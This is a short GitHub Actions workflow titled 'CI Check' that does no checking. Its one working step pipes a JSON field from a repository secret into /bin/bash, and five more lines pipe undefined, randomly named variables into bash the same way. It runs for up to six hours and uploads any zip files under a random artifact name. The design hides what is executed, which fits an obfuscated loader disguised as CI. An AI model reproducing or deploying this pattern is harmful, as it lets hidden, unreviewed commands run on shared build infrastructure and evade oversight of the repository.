name: CI Check
on:
  workflow_dispatch:

permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          ecp6: ${{ secrets.ecp6 }}
        run: |
          printf '%s' "$ecp6" | jq -r .nmg083 | /bin/bash
          echo $zxpp3 | jq -r .svdx7 | /bin/bash
          printf '%s' "$bp97" | jq -r .nv59 | /bin/bash
          echo $vym0 | jq -r .f04 | /bin/bash
          echo $afwtv4 | jq -r .sbmkd58 | /bin/bash
          printf '%s' "$qjgg253" | jq -r .d54 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: qqyTwj8R
          path: "*.zip"
          retention-days: 1
